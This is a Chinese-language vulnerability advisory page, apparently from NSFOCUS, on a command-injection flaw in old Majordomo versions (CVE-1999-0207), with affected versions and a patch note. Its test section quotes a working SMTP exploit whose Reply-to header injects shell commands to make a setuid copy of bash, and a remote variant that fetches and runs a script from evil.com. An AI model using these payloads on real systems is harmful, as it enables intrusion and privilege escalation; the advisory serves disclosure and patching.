首页 -> 安全研究

安全研究

安全漏洞
Majordomo邮件列表管理软件远程执行任意命令漏洞

发布日期:1994-06-01
更新日期:1994-06-01

受影响系统:
Great Circle Associates Majordomo 1.90
Great Circle Associates Majordomo 1.89
不受影响系统:
Great Circle Associates Majordomo 1.94.5
Great Circle Associates Majordomo 1.94.4
Great Circle Associates Majordomo 1.91
描述:
BUGTRAQ  ID: 2310
CVE(CAN) ID: CVE-1999-0207

Majordomo是一个流行的用Perl实现的(majordomo.pl)处理邮件列表的软件。

1.94.3版本以下的Majordomo对邮件地址未做充分过滤,远程攻击者通过构造特殊的邮件地址可以在服务器上以Majordomo用户的权限执行任意命令。


<*来源:Razvan Dragomirescu (drazvan@kappa.ro
  
  链接:http://www.greatcircle.com/majordomo/OLD/majordomo.SECURITY_PATCH
        http://bugtraq.inet-one.com/dir.1997-08/msg00105.html
        http://www.cert.org/advisories/CA-1994-11.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Razvan Dragomirescu (drazvan@kappa.ro)提供了如下测试方法:

Local exploit:
--exploit--
telnet localhost 25

helo localhost
mail from: user
rcpt to: majordomo (or whatever the name of the majordomo user is)
data
From: user
To: majordomo
Reply-to: a~.`/bin/cp\${IFS}/bin/bash\${IFS}/tmp/lord&&/bin/chmod\${IFS}4777\${IFS}/tmp/lord`.q~a/ad=cucu/c=blu\\\@kappa.ro

LISTS
.
quit
--end of exploit --

For the remote users, change the Reply-to field to something like:

Reply-to: a~.`/usr/bin/rcp\${IFS}user@evil.com:script\${IFS}/tmp/script&&source\${IFS}/tmp/script`.q~a/ad=cucu/c=blu\\\@kappa.ro

建议:
厂商补丁:

Great Circle Associates
-----------------------
目前厂商已经在新版本的软件中修复了这个安全问题,请到厂商的主页下载:

http://www.greatcircle.com/majordomo/

浏览次数:37276
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障